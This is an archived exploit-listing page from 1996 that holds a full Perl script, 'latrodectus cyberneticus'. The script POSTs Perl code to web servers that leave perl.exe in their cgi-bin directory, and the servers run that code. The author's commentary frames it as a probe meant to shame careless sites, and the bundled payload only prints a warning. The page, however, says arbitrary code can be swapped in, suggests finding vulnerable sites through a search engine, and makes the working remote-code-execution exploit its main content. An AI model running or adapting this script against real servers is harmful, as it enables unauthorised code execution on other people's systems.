PC Web site interpretor in cgi-bin directory vulnerability
Description: | A lot of idiots with PC web servers put perl.exe in their cgi-bin directory. |
Author: | tchrist@perl.com wrote this exploit |
Compromise: | Execute arbitrary perl code on a PC (remote) |
Vulnerable Systems: | Mostly PC web servers. Wherever anyone is stupid enough to leave perl.exe in cgi-bin dir |
Date: | 28 March 1996 |
Notes: | You can find vulnerable site via altavista. More information on this program available at http://www.perl.com/perl/news/latro-announce.html |
Exploit:
#!/usr/bin/perl -w
#
##############################################################################
# latrodectus cyberneticus - probe web for insecure perl installations
# tchrist@perl.com
# version 1.0, Thu Mar 28 17:53:42 MST 1996
#
# requires the LWP library, fetchable from the CPAN multiplexor at
# http://www.perl.com/cgi-bin/cpan_mod?module=LWP
##############################################################################
require 5.002;
use strict;
use LWP::UserAgent;
=head1 NAME
latrodectus cyberneticus - probe web for insecure perl installations
=head1 SYNOPSIS
Via command line arguments:
latro host1 //host2/bincgi //host3/bincgi/badperl
or via STDIN:
sed 's/ .*//' access_log | sort -u | latro
=head1 DESCRIPTION
B is designed to probe whether your site or sites you control have
been compromised by the insanely idiotic practice of placing a perl
executable in the cgi-bin. If you have ever seen anyone post a URL like
http://dummy.org/cgi-bin/perl.exe?FMH.pl
then you know they have the problem. This is pathetically
pervasive amongst (horrifically mismanaged) sub-Unix web sites.
=head1 USE AND MISUSE
Robert Heinlein once wrote: "Stupidity cannot be cured with money, or
through education, or by legislation. Stupidity is not a sin, the victim
can't help being stupid. But stupidity is the only universal capital
crime; the sentence is death, there is no appeal, and execution is carried
out automatically and without pity."
Consider this program such execution -- or at least the threat thereof.
You can do very evil things with this program. Very evil things. You can
execute I on their site. Please don't do anything
(too) wicked. When you find such sites, please do the responsible and professional
thing and mail their cluefully challenged webmaster about the problem.
My goal with this program is to shake up the web a little bit now lest a
I poison spider should someday rip it to shreds and blame perl. It's not
perl's fault. It's the idiocy of the PC web sites -- and the vendors and
docs that tell them to do this ineffably idiotic and evil thing.
=head1 AUTHOR
Tom Christiansen
Last update:
Thu Mar 28 17:53:42 MST 1996
=cut
my $PROGNAME = "latrodectus cyberneticus";
my $VERSION = "1.0";
my $DEF_CGI_BIN = "/cgi-bin";
# should prolly both "perl" and "perl.com" as well as
# the "perl.exe" thing.
my $DEF_PERL_PATH = "/perl.exe";
my $PROGRAM = join qq===>;
$| = 1;
#use LWP::Debug qw(level);
#level('+');
if (@ARGV) {
for (@ARGV) { probe($_) }
} elsif (!-t STDIN) {
while () {
chomp;
probe($_);
}
} else {
die "usage: $0 [site ...]\n";
}
sub probe {
my $site = shift;
my $cgi_bin = '';
my $perl_path = '';
my $pre_site = '';
if ($site !~ m#/#) {
$cgi_bin = $DEF_CGI_BIN;
}
if ($site !~ /perl/) {
$perl_path = $DEF_PERL_PATH;
}
if ($site !~ m#^//#) {
$pre_site = '//';
}
my $ua = LWP::UserAgent->new();
$ua->agent("$PROGNAME, v$VERSION");
my $full_targ = 'http:' . $pre_site . $site . $cgi_bin . $perl_path;
printf "%-35s ", $site;
my $req = HTTP::Request->new( POST => $full_targ );
$req->content_type('application/x-www-form-urlencoded');
$req->content($PROGRAM);
my $res = $ua->request($req);
# check the outcome
if ($res->is_success) {
if ($res->content =~ /WWW Black Widow/) {
print "<<<< COMPROMISED >>>\n";
} else {
my $oops = $res->content;
$oops =~ s/\n/ /g;
print "APPREHENDED: $oops\n";
}
} else {
my $oops = $res->code . " " . $res->message;
if ($res->code == 404) {
print "SAFE: $oops";
} else {
print "ERROR: $oops";
}
print "\n" unless $oops =~ /\n$/;
}
}
__END__
# Here begins the remote program. Whatsoever you place
# within this code shall be executed on the foreign system,
# without checks, without pity, and without remorse.
#
# Play nicely.
print <;
print "If I were nasty, you'd be spiderfood by now.\n";
print "\n\n\t--the black widow\n";
__END__
The master index of all exploits is available
here (Very large file)
Or you can pick your favorite operating system:
This page is part of Fyodor's exploit
world.
For a free program to automate scanning your network for vulnerable
hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resources: